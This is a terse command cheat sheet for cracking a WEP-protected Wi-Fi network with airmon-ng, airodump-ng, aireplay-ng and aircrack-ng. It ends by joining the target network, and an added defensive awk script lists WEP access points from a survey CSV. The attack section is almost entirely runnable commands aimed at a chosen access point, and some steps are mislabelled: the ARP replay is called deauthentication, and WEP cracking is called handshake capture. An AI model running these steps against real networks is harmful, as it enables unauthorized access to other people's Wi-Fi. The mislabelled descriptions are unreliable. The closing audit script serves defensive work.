Attack WEP
Start Monitor mode:
# start monitor mode
sudo airmon-ng start wlan0
# stop monitor mode (do this before reconnecting to Wi-Fi)
sudo airmon-ng stop wlan0mon
# list nearby APs with WPS information
sudo airodump-ng wlan0mon --wps
Start capturing the hash of the handshake:
sudo airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w capture_WEP wlan0mon
In parallel, run the deauthentication attack:
# -b takes the AP's BSSID (MAC address), not the SSID name
sudo aireplay-ng -3 -b $AP_MAC -h $STATION_MAC wlan0mon
Crack the handshake:
# airodump-ng appends a sequence number (-01) to the -w prefix
sudo aircrack-ng capture_WEP-01.cap
After cracking, you can connect to the Wi-Fi directly, either through the UI or from the terminal as below:
sudo iwconfig wlan0 essid <target SSID Name> key <hexKey>
# refresh the DHCP Configuration
sudo dhclient wlan0
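
For the defensive side of this procedure, the following script is an added example, not part of the original notes: airodump-ng's -w option also writes a CSV summary next to the capture (capture_WEP-01.csv for the prefix used above), and the script lists the access points in a survey of your own site that still advertise WEP so they can be moved to WPA2/WPA3. The function names and the sample survey data are constructed for illustration.

```bash
#!/bin/sh
# Added example: list APs in an airodump-ng CSV that still advertise WEP.
# Assumed layout (standard airodump-ng CSV): AP table first, then the
# "Station MAC" table; field 4 = channel, 6 = Privacy, 14.. = ESSID, last = Key.

# list_wep_aps is a hypothetical helper name; reads a CSV file ($1) or stdin.
list_wep_aps() {
  awk -F',' '
    function trim(s) { gsub(/^[ \t\r]+|[ \t\r]+$/, "", s); return s }
    /^Station MAC/ { exit }            # client table follows: stop here
    /^BSSID/ || NF < 15 { next }       # skip the header and blank lines
    {
      if (trim($6) !~ /(^| )WEP( |$)/) next
      # An ESSID may itself contain commas: rejoin fields 14 .. NF-1.
      essid = $14
      for (i = 15; i < NF; i++) essid = essid "," $i
      printf "%s ch=%s essid=%s\n", trim($1), trim($4), trim(essid)
    }
  ' "$@"
}

# Constructed sample survey (made-up BSSIDs and names, not real networks).
sample_csv() {
  cat <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP , WEP,   , -40,      120,      300,   0.  0.  0.  0,   7, old-lab,
02:00:00:00:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 130, WPA2, CCMP, PSK, -55,      200,        0,   0.  0.  0.  0,   6, office,
02:00:00:00:00:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, WEP, WEP,   , -70,       80,       12,   0.  0.  0.  0,  11, printer,2nd,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:00:AA, 2024-01-01 10:00:10, 2024-01-01 10:04:00, -50,       40, 02:00:00:00:00:01, WEP
EOF
}

# Demonstration run on the constructed sample.
sample_csv | list_wep_aps
```

On a real survey, pass the CSV path as the argument, e.g. `list_wep_aps capture_WEP-01.csv`.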
Stuck?
--> https://securitysynapse.blogspot.com/2013/12/wireless-pentesting-on-cheap-kali-tl.html
http://www.onnocenter.or.id/wiki/index.php/Attacks:_WEP_Cracking,_WPA_Handshake_Capture